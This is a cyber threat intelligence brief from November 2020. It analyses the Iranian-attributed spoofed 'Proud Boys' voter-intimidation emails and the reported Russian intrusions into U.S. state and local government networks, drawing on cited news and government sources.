CICYBER Team: Dayna McNeil, Federico Bertola, Haley Bounds, Hubert Zhang, Kaitlynn Belmont, Maaz Qureshi,
Date: November 1, 2020
Executive Summary: On 21 October 2020, the Director of National Intelligence (DNI) John Ratcliffe stated that Iran and Russia obtained American voter registration data in the weeks leading up to the United States (U.S.) presidential election.[1] The Federal Bureau of Investigation (FBI) received reports of hundreds of emails claiming to come from a Proud Boys server threatening violence against individuals who do not vote for President Donald Trump. U.S. intelligence officials believe Iran was responsible for the threatening emails. The Proud Boys claim no responsibility, as they had been kicked from the domain that the emails were sent from a few days prior.[2] Iran has denied responsibility in an official statement on Twitter.[3] The Russian press secretary for Vladimir Putin has denied charges of Russian election interference.[4]
Overview: According to the DNI, Iran and Russia obtained voter registration information and engaged in cyber espionage operations against the U.S. Russian intelligence reportedly obtained state, local, tribal, and territorial (SLTT) government documents and aviation network documents detailing network configurations and credentials, cybersecurity practices, and other sensitive information.[5] Iran reportedly executed a fabricated email campaign targeting U.S. voters by state-sponsored hackers. The DNI states that Iranian hackers, masquerading as the Proud Boys, sent emails to U.S. voters in Florida, Alaska, Pennsylvania, and Arizona, threatening them with violence if they do not vote for Donald Trump ahead of the 3 November 2020 election. Floridians received hundreds of emails, 183 of which were received by individuals associated with the University of Florida.[6]
Analysis: The spoofed emails did not originate from the displayed address of info@officialproudboys.com but rather servers located in Estonia and Saudi Arabia.[7] They also contained spelling errors in some cases.[8] The emails are similar to sextortion phishing emails in that they threaten recipients with consequences - in this case, violence - if they do not meet the attackers’ demands. The emails included a video attachment that shows the hackers purportedly stealing voter registration data from an official voter database.
The video shows the threat actor exfiltrating data from a database they claim is an official voter registration database. However, the targeted server’s IP address is briefly shown on screen, indicating that it is based in Moldova.[9] This oversight led U.S. Intelligence officials to conclude that Iranian hackers were responsible for the email campaign.[10] Reuters reports that anonymous sources have claimed that the Moldovan database server was hosted by Worldstream, a Dutch internet service provider.[11] The sources, reportedly cybersecurity researchers, claim that they have seen Iranian hackers use Worldstream infrastructures to launch previous cyber attacks.[12] Worldstream has informed Reuters that the account associated with the Moldova-based IP address has been banned and that the Dutch National Cyber Security Center is investigating the incident.[13] The speed of the threat actor’s data exfiltration is unusual, as the tool used to exfiltrate the data, SQLMap, typically does not obtain results so quickly.[14] It is likely that they created the Moldova-based database, disguised as an official voter database, to showcase themselves hacking into it quickly.
After the SQLMap footage, the video shows a clip of the hackers accessing supposed Federal Write-In Absentee (FWAB) ballots across 40 states. Each state is represented by a folder containing hundreds of supposed FWAB ballots inside. The hackers did not open any of the purported ballots except for those in the Alaska folder. However, influencing the election with FWAB ballots would be near-impossible given the numerous requirements, physical mail-in process, and rarity of use.[15] The hackers’ actions indicate their goal was to create the perception that official voter registration databases are insecure and easily compromised.[16]
The threat actor likely obtained the spoofed email campaign’s voter registration data through open-source intelligence and other collection methods. Voter registration and party affiliation are all considered public records in Florida, Alaska, Pennsylvania, and Arizona. Many of those who received the emails likely had their email accounts compromised in previous data breaches. The threat actor likely obtained them in a similar manner to emails collected for phishing and spam messages. This would explain why many of the states affected had not reported data breaches before voters received emails on 20 October.[17] This is not the first time a video of hacking methodology led to purported Iranian involvement. In July 2020, IBM’s cybersecurity division discovered several videos, comprising five hours of footage, on an exposed online server. The videos appeared to be training videos showcasing purported Iranian hackers obtaining victims’ credentials and compromising their email and social media accounts.[18] However, unlike the July 2020 videos, which appear to be an oversight by the threat actors, the spoofed Proud Boys hacking video was intentionally included with the emails. A comparison of the footage from both incidents may provide further insight into an Iranian connection with the spoofed emails.
Although typically considered a less sophisticated cyber actor than other state adversaries, Iran is much more willing to take risks with offensive cyber operations.[19] Russia’s alleged actions indicate a clandestine operation to collect information for future operations, i.e., U.S. SLTT government documents. The fabricated email campaign is a much more offensive attack promoting violence against U.S. voters by an armed domestic group, demonstrating the threat actor’s capability to actively monitor the landscape of political movements in the U.S., and manipulate them to raise tensions, cause violence, and destabilize the country.
Impact: Following the spoofed email campaigns threatening Florida, Alaska, Pennsylvania, and Arizona residents to vote for Trump, Joe Biggs, a Florida-based organizer for the Proud Boys, took to social media site Parler to declare war on Iran.[20] These states claim their voter databases have not been breached.[21] Google has reported that 25,000 emails were sent to Gmail users.[22]
Internationally, these attacks on election infrastructures may deteriorate the image of U.S. stability, security, and global influence. Domestically, they aim to sow confusion and distrust in American democracy, creating divisions between the American people and reducing their trust in government institutions. These attacks may create the perception of massive vulnerabilities in the U.S. election system, undermining the credibility of electoral results. This could raise the possibility of riots and clashes in defiance of election results, fueling chaos across the streets, and destabilizing institutional credibility.
[1] DNI John Ratliffe’s Remarks at Press Conference on Election Security, Office of the DNI, October 2020 https://www.dni.gov/index.php/newsroom/press-releases/item/2162-dni-john-ratcliffe-s-remarks-at-press-conference-on-election-security
[2] Proud Boys websites kicked off web host, Google Cloud, ZDNet, October 2020, https://www.zdnet.com/article/proud-boys-websites-kicked-off-google-cloud/
[3] Statement from spokesman of Iranian Mission to the United Nations, October 21, 2020, https://twitter.com/miryousefi/status/1319098206861594624
[4] Kremlin Dmitry Peskov denies Russia offered Taliban bounties to kill U.S. troops https://www.msnbc.com/andrea-mitchell-reports/watch/kremlin-dmitry-peskov-denies-russia-offered-taliban-bounties-to-kill-u-s-troops-86348869799
[5] Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets, FBI & CISA, October 2020 https://us-cert.cisa.gov/sites/default/files/Joint_CISA_FBI_CSA-AA20-296A__Russian_State_Sponsored_APT_Actor_Compromise_US_Government_Targets.pdf
[6] Feds point to Iran, Russia for emails urging Floridians to vote Trump https://www.politico.com/states/florida/story/2020/10/21/vote-for-trump-or-else-feds-review-threatening-emails-sent-to-florida-voters-1328913
[7] Analysis of Wednesday’s foreign election interference announcement, Election Integrity Partnership, October 2020, https://www.eipartnership.net/rapid-response/foreign-election-interference-announcement
[8] Emails threatening Democratic voters circulate in Collier, Lee counties, News-press, October 2020, https://www.news-press.com/story/news/2020/10/21/emails-threatening-democratic-voters-circulate-collier-lee-counties/6005267002/
[9] Analysis of Wednesday’s foreign election interference announcement, Election Integrity Partnership, October 2020, https://www.eipartnership.net/rapid-response/foreign-election-interference-announcement
[10] Ibid.
[11] Exclusive: 'Dumb mistake' exposed Iranian hand behind fake Proud Boys U.S. election emails - sources, October 2020, https://www.reuters.com/article/us-usa-election-cyber-iran-exclusive/exclusive-dumb-mistake-exposed-iranian-hand-behind-fake-proud-boys-u-s-election-emails-sources-idUSKBN2772YL
[12] Analysis of Wednesday’s foreign election interference announcement, Election Integrity Partnership, October 2020, https://www.eipartnership.net/rapid-response/foreign-election-interference-announcement
[13] Ibid.
[14] Ibid.
[15] Ibid.
[16] Ibid.
[17] 3 states targeted in Iranian email scheme report no evidence of breaches, CBS News, October 2020, https://www.cbsnews.com/news/iran-emails-florida-alaska-arizona-no-evidence-breaches/
[18] Iranian cyberspies leave training videos exposed online, ZDNet, July 2020, https://www.zdnet.com/article/iranian-cyberspies-leave-training-videos-exposed-online/
[19]The Cyber Threat from Iran after the Death of Soleimani, CTC Sentinel, February 2020, https://ctc.usma.edu/cyber-threat-iran-death-soleimani/
[20] Proud Boys Declare 'This Means War' Following Iran Voter Intimidation Threats, Newsweek, October 2020, https://www.newsweek.com/proud-boys-email-iran-war-vote-intimidation-1541252
[21] 3 states targeted in Iranian email scheme report no evidence of breaches, CBS News, October 2020, https://www.cbsnews.com/news/iran-emails-florida-alaska-arizona-no-evidence-breaches/
[22] Google said an Iran-linked disinformation campaign targeted 25,000 Gmail users, after US intelligence said Iran was trying to 'influence public opinion' ahead of Election Day, Business Insider, October 2020, https://www.businessinsider.com/google-voter-intimidation-emails-iran-proud-boys-john-ratcliffe-election-2020-10